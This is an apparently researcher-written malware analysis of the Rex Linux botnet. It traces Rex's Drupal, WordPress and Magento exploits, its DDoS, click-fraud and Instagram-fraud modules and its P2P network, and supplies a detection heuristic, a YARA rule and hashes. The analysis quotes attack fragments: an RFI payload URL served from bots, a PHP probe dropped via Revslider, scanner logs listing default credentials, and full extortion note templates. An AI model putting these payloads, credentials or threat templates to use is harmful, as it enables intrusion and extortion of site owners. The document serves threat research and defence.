illustration by Craig Simmons

Octopus-Rex. Evolution of a multi-task botnet


Over the last decade, many malware families have targeted Linux servers: Elknot, Encoder, Mirai, LuaBot, NyaDrop, Gafgyt and others. Most of them are used for DDoS, but there are exceptions, and Rex is one of them.
This article presents a detailed analysis of Rex, a recent malware family written in Go. Monitoring its activity over the last seven months shows the steady effort its developer has put into adding new features.

Malware overview

Rex is a hybrid between a malware and a tool: its behaviour depends on the command-line arguments it is started with.
It can be used in two different ways:
– Scan mode: with the "scan" command-line argument, the binary uses its embedded exploits to infect new Linux servers.
– Without scan mode: Rex contacts other bots through its P2P protocol (a DHT carried over HTTPS) and waits for commands.
Rex is always installed as a hidden file in /tmp/. It has no persistence mechanism and no other hiding feature; quite the contrary, it even ships a help menu (-h).

benkow@stormshield:/home/rex/tmp$ ./.Z9g5aas0p0 -h
Usage of ./.Z9g5aas0p0:
        enable debugging
  -elevate.ignore string
        credentials to ignore during elevation (default "root")
        skip elevation (default true)
        enable stdio ipc
        log DHT requests
        log HTTP requests
  -socks string
        SOCKS5 proxy address
  -strategy string
        scan strategy [random, sequential] (default "random")
  -target string
        target(s) (default "")
  -wait int
        wait for PID to exit before starting (0: disable)
        enable WordPress Pingback

The help menu lists the features available in both modes (scan or C&C).
Argument details:
– Debug/log: run the malware in debug mode, which is handy for analysis.
– Elevate: Rex can try to run itself as root by brute-forcing the local SSH service; specific credentials can be excluded with -elevate.ignore.
– Ipc: we have not seen this feature used yet.
– Socks: route Rex's traffic through a SOCKS5 proxy.
– Strategy: how Rex picks the IPs it scans (random or sequential).
There are also hidden arguments: Rex can be used as a DDoS tool with the argument "-stresser target".
The main process handles the botnet communication; when the bot master sends a command, the main process forks a child with that command as its argument.
This is why an infected host shows several Rex processes.

Development cycle

Rex is a very active botnet: the binary is updated on a daily basis. Below is an overview of seven months of new features.

Once upon a time… Rex – April 2016

The first version (a808a6e45d4f3837fcf30a28f6594ffff320f9b994eb35f7e915dd9d954c912c) was spotted at the end of April 2016.
Debug log strings show that the malware was built in "/home/ubuntu/src/rex/".


The first version was mainly used to infect an initial group of servers. It contained several exploits but few useful features.
Rex tries to infect other servers through web exploits (WordPress, Drupal, ...).
To exploit a remote file inclusion (RFI) vulnerability, the remote file is served by already-infected machines on port 5099, e.g. https://%s:5099/payload/php/%s/wp-gwollegb/ for the gwollegb (Gwolle Guestbook) RFI exploit.


Rex infects Drupal websites via CVE-2014-3704, a SQL injection that lets an attacker change the admin password. The injection serves two purposes: getting access to the server, and locking the website in order to ask for a ransom.
After exploitation, Rex posts a blog entry on the homepage with the following message:
“Website is locked. Please transfer 1.4 BitCoin to address 3M6SQh8Q6d2j1B4JRCe2ESRLHT4vTDbSM9 to unlock content.”
In the first version, the Drupal locker was the only "visible" feature.


Rex embeds exploits for the following WordPress plugins:
– Revslider
– Site-import
– Brandfolder
– Squirrel
– Robo-gallery
– Gwolle
– Woocommerce
– Issu panel

Here is an example of an infection:


In this example, Rex exploits the Revslider WordPress plugin to upload a zip file containing a PHP script that checks the PHP configuration (safe_mode, disable_functions, open_basedir) before dropping the binary:

<?php print(ini_get('safe_mode').'|'.ini_get('safe_mode_exec_dir').'|'.ini_get('disable_functions').'|'.ini_get('open_basedir'));;die('ok - h5tmVOxiMH');?>

If the checks pass, the Rex binary is uploaded and executed, and the server is infected.


Rex embeds a module called "Kerner", named in reference to the "Kerner on security" blog. This module exploits a remote code execution vulnerability in CCTV-DVR devices.


Rex also embeds two Jetspeed exploits (CVE-2016-0709 and CVE-2016-0710). Both are flagged as "TODO" and are not functional yet.

“We are armada collective” – May 2016

One month later, the bot master pushed the first big update, with an interesting feature: a ransom note sent to the Drupal admin (21-05-2016, 92651d4a11a43a9043a8126f2ada1e5bf1e00cb506d46c939e20f3ece93cb81d).

We are Armada Collective.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

An interesting fact about this ransom note: CloudFlare reported this threat in March 2016, but we spotted the first version of Rex carrying it only at the end of May 2016.
A closer look shows that the note is not exactly the same: it contains the same nonsense about 1 Tbps DDoS attacks, but the sender email differs from the one CloudFlare observed.
This coincidence suggests that the Rex developers ran some tests with this threat before creating Rex. At this point, no real DDoS feature was present in the binary.
Three days later (24-05-2016), another update came with a first real DDoS implementation, DnsAmpl.

Optimizations time – June 2016.

During June 2016 we did not notice major updates, but the bot master kept refactoring the source code until the end of the month.
At the end of June, Rex gained a complete "stresser" module: the malware now supports many DDoS types (HTTP, SlowLoris, DNSAmp, ...) and the build machine moved to "/home/user/src/rex/".

“We are anonymous” – July 2016

A few days later (09-07-2016) Rex added three new exploits:
– Drupal RESTWS RCE exploit
– Magento RCE exploit (CVE-2015-1397)
– AirOS arbitrary file upload exploit
The ransom note was rewritten. It no longer mentions Armada Collective; the senders now call themselves "Anonymous".

We are Anonymous.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) 
if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
Right now we will start 15 minutes attack on your site's IP {{ .IP }}. It will not be hard, 
we will not crash it at the moment to try to minimize eventual damage, 
which we want to avoid at this moment. It's just to prove that this is not a hoax. Check your logs!
If you don't pay by {{ .Time.Weekday.String }}, 
attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, 
instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

The ransom note tries to be more credible: it asks the victim to check their logs, something it could not do before for lack of a DDoS feature. It is still not enough to earn money: we checked some of the bitcoin addresses and all of these wallets were empty.
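The {{ ... }} placeholders in both notes are Go text/template actions: .Time, .Amount, .Address, .Step and .IP are fields of a data structure the bot fills in per victim, and .Time.Weekday.String and .Time.Format "Jan 2 2006" are method calls on a Go time.Time. The program below is an added example, not code from the sample or from its authors: it renders the later note with Go's text/template to show what a victim actually receives. The NoteData struct and its field types, the deadline date and the bitcoin address are assumptions. The practical point for anyone writing mail filters or honeypot signatures is to match the rendered text ("starting Monday (Jul 11 2016)"), since the template syntax never reaches the victim.

```go
package main

import (
	"bytes"
	"fmt"
	"text/template"
	"time"
)

// noteTemplate is the "Anonymous" note as recovered from the sample (abridged);
// the {{ ... }} tokens are Go text/template actions.
const noteTemplate = `We are Anonymous.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
Right now we will start 15 minutes attack on your site's IP {{ .IP }}. Check your logs!
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
`

// NoteData is an assumed structure: the field names come straight from the
// template, the types are a guess (any value fmt can print would work).
type NoteData struct {
	Time    time.Time // payment deadline; weekday and date are both derived from it
	Amount  float64   // initial ransom in BTC
	Address string    // bitcoin address to pay
	Step    float64   // daily price increase in BTC
	IP      string    // victim IP quoted in the "test attack" sentence
}

// RenderNote fills the template the way the bot would before emailing it.
func RenderNote(d NoteData) (string, error) {
	tmpl, err := template.New("note").Parse(noteTemplate)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, d); err != nil {
		return "", err
	}
	return buf.String(), nil
}

func main() {
	// Constructed values for the demonstration; the address is not a real ransom address.
	note, err := RenderNote(NoteData{
		Time:    time.Date(2016, time.July, 11, 0, 0, 0, 0, time.UTC),
		Amount:  0.5,
		Address: "1ExampleConstructedAddressXXXXXXXXXX",
		Step:    0.1,
		IP:      "203.0.113.7",
	})
	if err != nil {
		panic(err)
	}
	fmt.Print(note)
}
```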

BTCBrute and Clicky – August 2016.

Early in August, two important updates came. The malware grew by 1.5 MB and now embeds a bitcoin miner based on btcsuite and a click-fraud module called "clicky".
The click-fraud part is really interesting. Rex uses the botnet to display ads served by the a-ads network; the game is to use each bot to click on ads and earn money from advertisers. The good news is that a-ads campaigns are easy to track, which gives us nice statistics.
We spotted three ad units: 218355 (code name "Unicorns!"), 261029 (code name "Porkupines!") and 251270 (code name "Ferries!"). Two of them are tied to the bitcoin address 1HebiSQX2WfE2kXUuva79US4zNUxcYrHjZ and the last one to 1Q6mA6ERbwmaHX1nYwkrKuDiVjCYe2xma3.

unit 218355 – income details

unit 218355 – impressions details

The ads displayed looks like:

At the time of writing, the clicky module had generated about 1 €.

History of a fail – September 2016.

At the end of August, Rex's first big failure began (91164673cda591a9a4dec91ecda6dbb515d48df7b56108b5fa0053395c733188). Rex implemented a feature to mass-create Instagram accounts, probably for social-network fraud. But bypassing Instagram's anti-spam is not so easy 🙂
First, Rex tries to use the botnet to create Instagram account via
Each bot used its own IP to create these fake accounts. But Instagram's anti-spam measures blacklisted all the nodes of the botnet within minutes.

{ID: Name:oTmJzK6p Username:oTmJzK6p Password:DU9vD} 
(via &{Addr:XXX.XXX.XX.XXX:443 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): token
{ID: Name:Sin4a Username:Sin4a Password:eVdU6} 
(via &{Addr:XXX.XXX.XX.XXX:443 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): ip blacklisted

One week later, because of the node blacklisting, the bot master added a SOCKS proxy feature to get around the Instagram blacklist.
This new feature resulted in two more failures:
– The first implementation failed because the generated passwords were too short.

{"status": "ok", "errors": {"password": ["Create a password at least 6 characters long."]}, 
"account_created": false}instagram.AccountCreate 
&{ID: Name:ZRSlnk3uH Username:ZRSlnk3uH Password:A1EtB} 
(via &{Addr:X.XXX.XXX.XX:80 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): not created

– The second failure comes from the fact that Rex uses public SOCKS proxy lists, which Instagram already blocks as open proxies.

{"status": "ok", "errors": 
{"ip": ["The IP address you are using has been flagged as an open proxy. 
If you believe this to be incorrect, please visit"]}, 
"account_created": false}instagram.AccountCreate 
&{ID: Name:LOT8mWL Username:LOT8mWL Password:yF7QO3} 
(via &{Addr:XXX.XX.XX.XX:80 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): ip blacklisted

After one month of failures, we have not seen the bot master use this feature again.

When Rex meets Mirai – October 2016

After seven months, Rex's main problem is its low number of bots. Without a large botnet it is hard to get a real return on investment.
September 2016 (4b513dfc68fe825e5f83c51fc1a023c15bf1039e48e025a0a4f4b034dbf443b9) was also the month when the media put the spotlight on the Mirai botnet (an IoT botnet used for DDoS).
After the Mirai source code leaked, the Rex developer tried to implement the Mirai telnet scanner in Rex.

*scanner.telnet.mirai - trying ubnt:ubnt
*scanner.telnet.mirai - prompt at 36 in "ubnt\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 38 in "enable\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 38 in "system\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 37 in "shell\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 34 in "sh\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - credentials incorrect "/bin/busybox MIRAI\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - trying 888888:888888
*scanner.telnet.mirai - prompt at 38 in "888888\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 38 in "enable\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 38 in "system\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 37 in "shell\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 34 in "sh\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - credentials incorrect "/bin/busybox MIRAI\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - trying root:xc3511
*scanner.telnet.mirai - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "

As usual, this first buggy version of the Rex telnet scanner was tested directly in the wild. Unfortunately for the bot master, after one week of telnet scanning only a few new victims (fewer than 10) were infected. But from now on, when you retrieve what looks like a Mirai sample from a honeypot, make sure it is not Rex ;).
At the end of October (25-10-2016, 1058cce9f28c2a3522c31b67e913f00f229c2e00977c979dd68237e184c6df79) an update added an SSH scanner. The malware scans the Internet for SSH services and tries to brute-force them with the same password list as Mirai.

*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.login root anko - version "SSH-2.0-dropbear_0.52"
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.login [root anko]: wait: remote command exited without exit status or exit signal
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh

One last funny fact: this version includes a set of command-line flags used for testing and benchmarking. Maybe they hired a quality engineer. More prosaically, these -test.* flags are the standard flags registered by Go's testing package, so the binary was linked with that package (for example built as a test binary with go test -c) rather than shipping a hand-written QA command set.

benkow_@stormshield:/home/rex# ./rex -h
Usage of ./rex:
        enable debugging
  -elevate.ignore string
        credentials to ignore during elevation (default "root")
        skip elevation (default true)
        enable stdio ipc
        log DHT requests
        log HTTP requests
  -socks string
        SOCKS5 proxy address
  -strategy string
        scan strategy [random, sequential] (default "random")
  -target string
        target(s) (default "")
  -test.bench string
        regular expression per path component to select benchmarks to run
        print memory allocations for benchmarks
  -test.benchtime duration
        approximate run time for each benchmark (default 1s)
  -test.blockprofile string
        write a goroutine blocking profile to the named file after execution
  -test.blockprofilerate int
        if >= 0, calls runtime.SetBlockProfileRate() (default 1)
  -test.count n
        run tests and benchmarks n times (default 1)
  -test.coverprofile string
        write a coverage profile to the named file after execution
  -test.cpu string
        comma-separated list of number of CPUs to use for each test
  -test.cpuprofile string
        write a cpu profile to the named file during execution
  -test.memprofile string
        write a memory profile to the named file after execution
  -test.memprofilerate int
        if >=0, sets runtime.MemProfileRate
  -test.outputdir string
        directory in which to write profiles
  -test.parallel int
        maximum test parallelism (default 8) string
        regular expression to select tests and examples to run
        run smaller test suite to save time
  -test.timeout duration
        if positive, sets an aggregate time limit for all tests
  -test.trace string
        write an execution trace to the named file after execution
        verbose: print additional output
  -wait int
        wait for PID to exit before starting (0: disable)
        enable WordPress Pingback

We will keep monitoring all these features; the developer seems to be creative.

Crawling the botnet

As a reminder, Rex uses a DHT-based P2P protocol over HTTPS for communication. Because the client does not properly pin its certificates, it is easy to man-in-the-middle the malware's TLS traffic and then implement a crawler.
This is what a Rex DHT request looks like:

Rex uses the default Go User-Agent "Go-http-client/1.1" and sends gzip-encoded requests.
We know that DHT supports the following commands:
With those, it is easy to implement a quick crawler.
At the time of writing, despite the bot master's efforts, the botnet is still harmless (~150 bots), not enough for any significant DDoS.
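Because the DHT traffic is TLS, a network sensor that does not intercept it cannot see the Go-http-client/1.1 User-Agent or the gzip encoding; what it can see is the peer-to-peer pattern, namely a host that both accepts connections on port 5099 and fans out to many distinct peers on that same port. The program below is an added example (not the authors' crawler): it applies that heuristic to constructed connection records. The record format, the local network range and the peer threshold are assumptions.

```go
package main

import (
	"bufio"
	"fmt"
	"net"
	"sort"
	"strconv"
	"strings"
)

const rexPort = 5099 // port Rex uses for the DHT and for serving RFI payloads

// Flow is one connection record: who connected to whom, on which port.
type Flow struct {
	Src, Dst net.IP
	DstPort  int
}

// ParseFlows reads constructed "src dst dport" records, one per line, and
// skips anything malformed.
func ParseFlows(s string) []Flow {
	var flows []Flow
	sc := bufio.NewScanner(strings.NewReader(s))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		if len(f) != 3 {
			continue
		}
		src, dst := net.ParseIP(f[0]), net.ParseIP(f[1])
		port, err := strconv.Atoi(f[2])
		if src == nil || dst == nil || err != nil {
			continue
		}
		flows = append(flows, Flow{Src: src, Dst: dst, DstPort: port})
	}
	return flows
}

// Report describes one local host's activity on the Rex port.
type Report struct {
	Peers    map[string]bool // distinct remote IPs it talked to on 5099, in either direction
	Accepted bool            // it accepted at least one inbound connection on 5099
}

// Suspects applies the P2P heuristic: a local host is reported when it accepted
// inbound connections on the Rex port or talked to at least minPeers distinct
// peers on it. A client that merely contacts one server on 5099 is not reported.
func Suspects(flows []Flow, local *net.IPNet, minPeers int) map[string]*Report {
	all := map[string]*Report{}
	get := func(ip net.IP) *Report {
		r, ok := all[ip.String()]
		if !ok {
			r = &Report{Peers: map[string]bool{}}
			all[ip.String()] = r
		}
		return r
	}
	for _, f := range flows {
		if f.DstPort != rexPort {
			continue
		}
		if local.Contains(f.Src) {
			get(f.Src).Peers[f.Dst.String()] = true
		}
		if local.Contains(f.Dst) {
			r := get(f.Dst)
			r.Peers[f.Src.String()] = true
			r.Accepted = true
		}
	}
	out := map[string]*Report{}
	for host, r := range all {
		if r.Accepted || len(r.Peers) >= minPeers {
			out[host] = r
		}
	}
	return out
}

// sampleFlows is constructed: 10.0.0.5 behaves like a Rex node (fan-out plus an
// inbound peer), 10.0.0.8 is an ordinary client that contacted one host on 5099.
const sampleFlows = `10.0.0.5 203.0.113.9 5099
10.0.0.5 198.51.100.4 5099
10.0.0.5 192.0.2.77 5099
10.0.0.5 203.0.113.21 5099
10.0.0.5 203.0.113.9 5099
198.51.100.4 10.0.0.5 5099
10.0.0.8 203.0.113.9 443
10.0.0.8 198.51.100.4 5099
`

func main() {
	_, lan, _ := net.ParseCIDR("10.0.0.0/8")
	hosts := Suspects(ParseFlows(sampleFlows), lan, 3)
	names := make([]string, 0, len(hosts))
	for h := range hosts {
		names = append(names, h)
	}
	sort.Strings(names)
	for _, h := range names {
		r := hosts[h]
		fmt.Printf("%s: %d distinct peers on %d, accepted inbound: %v\n", h, len(r.Peers), rexPort, r.Accepted)
	}
}
```

The inbound check is the stronger of the two signals: a server has no business accepting connections on 5099 unless something is listening there, and on an infected host that something is Rex serving the DHT and the RFI payloads.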

We tried to identify the most affected country, but the random scan strategy spreads infections too evenly to conclude anything useful.


Linux malware is a trendy topic; new families show up every week. The huge number of vulnerable servers and the absence of anti-virus attract crooks to the Linux side. They can stay on a compromised server for several months without being detected. In the case of Rex, had the authors not implemented "visible" features like the Drupal locker, the malware would still be hidden.
Looking at how the bot master uses this botnet, we can conclude that he is probably not part of a big cyber gang; the Rex botnet looks more like an experiment.
2017 promises more funny crapware on Linux.


Quick and dirty YARA rule for VTi

rule Rex {
    meta:
        description = "Quick and dirty rule for Rex malware"
        author = "Benkow_@Stormshield"
    strings:
        $string1 = {6d 61 69 6e 2e 67 6f}   // "main.go"
        $string2 = {72 65 78}               // "rex"
        $string3 = {64 72 75 70 61 6c}      // "drupal"
    condition:
        all of them
}

Note that these three strings are short and common (the three bytes of "rex" in particular), so the rule is meant for triage on VirusTotal Intelligence rather than as a precise detection. It also only matches unpacked samples: a UPX-packed binary does not contain these strings in clear.

List of hashes (unpacked version only)



From website-locker to DDoS: Rex !

In May 2016, Softpedia wrote an article about a Drupal web ransomware. This malware exploits a SQL injection in the Drupal CMS, changes the admin credentials and asks for bitcoins to unlock the content.
After locking the website, a malware is executed on the server:

After this ends, the last uploaded file is a binary file written in the Go programming language, which is the actual ransomware. This Go binary deletes the file upload form and replaces it with the ransom note seen above.

Three months after this article, no sample of this malware was available on public repositories, so it was time to find one. We only knew that the malware is written in Go and exploits Drupal vulnerabilities. Thanks to @DlBlind, we also knew that it uses P2P to communicate.
Please note that this article is not a full reverse-engineering of the malware; it explains the attack vector and some interesting key features.

Sample Hunting

Googling "Website is locked. Please transfer 1.4 BitCoin to address", we can find a lot of hacked Drupal sites. After a quick look, we retrieved an unknown sample, executed as:

./G2eCM9jUiz -elevate.skip -wait 20619 2>/tmp/l

where the file "l" is actually a log file that looks like:

*node.Node.Run "random" 8184
*node.Node.runScanner *node.BlacklistFilter 0x18d7e4c0 7366
*rpc.Client.SetBinary "linux-386" 0x18c0b560

*rpc.Service.SetBinary &{Platform:linux-386 Binary:0x1901ae40}
new neighbor
new neighbor
new neighbor
new neighbor
new neighbor
new neighbor

The snippet above shows that the sample uses P2P communication.

A quick analysis shows that the sample is written in Go and compressed with UPX. At the time, it was not detected by any anti-virus on VirusTotal.
We found our sample, and it is an interesting one. Drupal locking is actually a very small part of the features of the self-named "Rex" malware, which is still evolving: we found many different variants from April to August 2016.

Rex malware weapons

Rex is made of 5 different parts, some of which still seem to be in development:

  • Attack vector
  • Bitcoin mining
  • C&C Communication
  • Ransom – Armada Collective
  • DDoS

Below, we look at each part in detail.

Attack vector

Depending on the variant, Rex scans the Internet for different vulnerable services. The kill chain is simple:

  • Bots are scanning Internet for vulnerable websites
  • Websites are infected and defaced (Drupal-locker)
  • “Rex” malware is dropped on the server
  • The server communicates with other bots via P2P.

Below is a non-exhaustive list of the exploits used by different variants of Rex.


Nothing new here: Rex exploits a SQL injection in Drupal 7 via CVE-2014-3704. The malware adds a new admin account, locks all blog posts with website-locker notes, then uploads and executes Rex.


Rex is able to infect other CMSs; WordPress plugins are the main targets. At least 8 exploits are available:

We found some infected WordPress websites but did not see any of them locked.


The botnet also scans for Magento e-commerce sites, looking for the ShopLift RCE. The attack is similar to the Drupal one: a new admin account is created and a webshell is used to execute Rex.


A few other exploits ship with Rex:

This list confirms that Rex does not focus on website locking but rather tries to build a P2P botnet.

Bitcoin mining

Like lots of malware, Rex has bitcoin-mining capabilities. We won't dig into the details here.

C&C communication

We have not looked deeper into the network part, but thanks to @silascutler and @DlBlind we know that this botnet uses a Kademlia P2P network ("/home/user/src/rex/dht/") on port 5099 with TLS enabled.

All the aforementioned weapons seem to be reachable through the P2P network.

Ransom – Armada Collective

The most curious feature of the malware is called RansomScanner. It retrieves the admin contacts of the infected website and sends them a DDoS threat email. Below is the email template:

Armada Collective <>
We are Armada Collective.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

It is the well-known template used by the Armada Collective crooks; lots of people have received this kind of email, and Cloudflare wrote a blog post about this ransom note.
This supposed gang sends extortion emails to online businesses, but nobody has seen any real DDoS. Unfortunately, this kind of scam seems to work:

In spite of the lack of actual DDoS follow through, it appears that many victims are paying the extortion fee. A security analyst from the Bitcoin analysis firm Chainalysis studied payments sent to the Armada Collective’s Bitcoin addresses and concluded that more than USD$100,000 has been sent to the attackers by victims.

An example of a StackExchange post:
But things are starting to change…


The Armada Collective emails look like a hoax, BUT we have seen infected servers actually run real DDoS attacks!

Armada Collective seems to have started a new strategy and tries to launch real attacks. The "1 Tbps" threat seems ridiculous, but if the botnet keeps growing by leveraging fresh vulnerabilities, it may become more harmful.

In recent versions of Rex, the ransom note has been updated:

We are Anonymous.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
Right now we will start 15 minutes attack on your site's IP {{ .IP }}. It will not be hard, we will not crash it at the moment to try to minimize eventual damage, which we want to avoid at this moment. It's just to prove that this is not a hoax. Check your logs!
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

Now the crooks mention a 15-minute test DDoS and ask the victim to check their logs as proof. They want to be taken seriously.
Rex looks like a strange kind of web-server ransomware: it does not encrypt files but locks access to the administration page and threatens a DDoS.


Linux botnets keep evolving and becoming very interesting. In this case, what at first sight looks like a Drupal locker is in fact a complete botnet, still in development, with many features.
In the next write-ups we will try to explain each module of this botnet.
As usual, the attack vector is not a 0-day but well-known vulnerabilities, so this article ends like the others:
If you are a website administrator, DO NOT LEAVE OUT-OF-DATE SERVICES ON THE INTERNET.


9070f56651f44ec722e17df67b8a954888e387a8f2574594c80937d0f39c471a  .0LD5dVbuo9
bf211d46551079e7f7646ffd6bfda065f1307ea81508d1625b5c65005d929cb3  .0OHjeERDbv
550b9b4c5b2dbe83fa3e227cca65b9b9768e2ea597c2e109205dba51faee5869  .0OhoU6US1m
677464da2fcf73b9793daca3191501da02957af08a6471a047410ce99ea49405  .0r4mKMUlJ6
69402f4bd7718a3403f1caaaa387edc70b299f6aecc06de39e3a9ac28873a184  .0rqNlrPujv
32c921dd4b755af519f648102098735a569a0326a79a911eb47174bd058e5c43  .0YOtp0GQMk
52bf6ae8fe7a0a59ca8d089444207c173e20a7a11c8b5e815b937e2f4224da4f  .1ZRhWKqTlY
950cd068d9c51b941bdfe4721a3156af15dc408d2df23c1f2bc41b87159b109e  .3v0UwARWmv
1f4d876b17a6d786aa793b9c529235f9f9e164d70a74d8d26ca850d18f1329a7  .3weUyhjJZe
09f1967e97a97a1d0963a84823fa2611b9555866f09d7a04bb69bc4d877f9631  .42wVPcdaFD
3e4cebd60a1d6a6b29bac68ace2547c2e3894a0e5865dd90aff5764f8e7dc16d  .4JkeqTzZSX
dcd0e1586630bc8c50fe600899bee76b853057fd9158ed541d7ddec53c8f2186  .5Ygi9nGrHn
cb42573e36fb148bc1109229a1025cdcb375c166361605f0681da9e54e3ef81d  .5ZFxAbOeBY
08ab4abd017568142d061ffd5a2592a491730dddb4485211fda53f39d43e3efb  .7RCBTpSOUh
ac36c87cacbe1b8327fae3084ebd1740a3a5c6c6f208c1c77da56932a9ca3be6  .7tsPagH3FM
d67ae5639618a3409711377e124ef2c6293200aa3026b8b2996654db63645481  .9bKas738kc
a1610e735042ce0197859e6fd7772039e63efce78d6c9cf642492d1c8f1d7540  .9G97ZhwNer
07dd2c7be7a0becb178967c43684c1a687deb217e87575d18fd6b73dc988bd78  .9MgvdLBtL0
dbc3f96fcbbfd90f877dc11fcdedca1c1e574b951ac70edc3160ed9f389c3fd3  .aH7HRrz554
8e7eaed42f50c865f72f7351b87a988de5aa94781b4dab4ddbe993872435f293  .bM04ITZnuq
97c1ed3d52d663f9bad2eef716169f06053dc2bcf8e3d857b0a702e8fae546c9  .C91EZKVz6Q
a1000d4cb81cfb7dfac660722938f3d9c7cb6e36c33e129097ddd29f3dfd1890  .cOVyPvf01L
9f568df46838872b389628b665940415d897823b2e1804e2625c3dfb0b6850b4  .D90yb8KdDV
cc01ba0825208402b0fc2eb62146e856f69d1e9f53b745d8f068f0d09e6170c0  .E61NBnYjak
40c882738ea1e01cc4e8027dd6ce5d55552e5630c8f65e86db630fca09d85fa9  .EETl2pJOf9
0e6c53797964b611c867cb5e5b492d45edf5472924c9a60a99433240f1712f15  .eLBaxwiu2d
c79d7b2a8caf5cc19a019772053c54d1ec02f8ae15b577bbbbd9bf82f19caedb  .fkmJQOIqYB
d097f55f82e88a32b057010c96f553aa7c8ccef12c2a8484aab0fb3dab9d4a0f  .H4g8bASf8Y
c058d576a108bdcf637a6ed399b4d9a1e3bbb6f194882ffada01b85e79109f65  .HdUykUNGy8
339eaabda43fbf0ee0caa6021a999d383713498911523d2b21e2ee2f1541f78f  .Ju7XqX36yy
3dee377037f7fcfd6539c23bb1cdc6eda46680c8773525b784150c1237788965  .KDnA4yWrGc
